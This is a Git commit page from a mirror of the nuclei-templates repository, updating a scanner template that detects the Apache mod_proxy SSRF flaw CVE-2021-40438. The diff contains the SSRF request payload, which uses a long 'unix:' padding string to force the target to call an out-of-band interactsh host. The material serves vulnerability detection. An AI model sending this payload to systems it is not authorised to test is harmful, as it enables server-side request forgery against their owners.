daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Fix CVE-2021-40438.yaml 

Current implementation of vulnerability check does not detect vulnerable servers.
This pr uses randomised interactsh hostname and check response headers for X-Interactsh-Version
patch-1
gtrrnr 2024-03-08 08:45:43 +03:00 committed by GitHub
parent 7f071a1f5a
commit 96ce225bc1
No known key found for this signature in database
GPG Key ID: B5690EEEBB952194
1 changed files with 4 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

11
http/cves/2021/CVE-2021-40438.yaml
View File

@ -21,7 +21,7 @@ info:
epss-percentile: 0.99749 epss-percentile: 0.99749
cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:* cpe: cpe:2.3:a:apache:http_server:*:*:*:*:*:*:*:*
metadata: metadata:
max-request: 2 max-request: 1
vendor: apache vendor: apache
product: http_server product: http_server
tags: cve2021,cve,ssrf,apache,mod-proxy,kev tags: cve2021,cve,ssrf,apache,mod-proxy,kev
@ -29,15 +29,12 @@ info:
http: http:
- method: GET - method: GET
path: path:
- '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{randbase(5)}}.com/' - '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://{{interactsh-url}}/'
- '{{BaseURL}}/?unix:{{repeat("A", 7701)}}|http://oast.pro/'
host-redirects: true host-redirects: true
max-redirects: 2 max-redirects: 2
matchers: matchers:
- type: dsl - type: dsl
dsl: dsl:
- "!contains(body_1, '<h1> Interactsh Server </h1>')" - contains(header_1, "X-Interactsh-Version")
- "contains(body_2, '<h1> Interactsh Server </h1>')"
condition: and
# digest: 4a0a00473045022054595b49ba72d99512a0d6ea2cb09a8a9b17077a63d51b94d79025a970c5e470022100b3a313e154e44c770642e0e8874fb62257de71ab53059714c607ec9d2c13a4ed:922c64590222798bb761d5b6d8e72950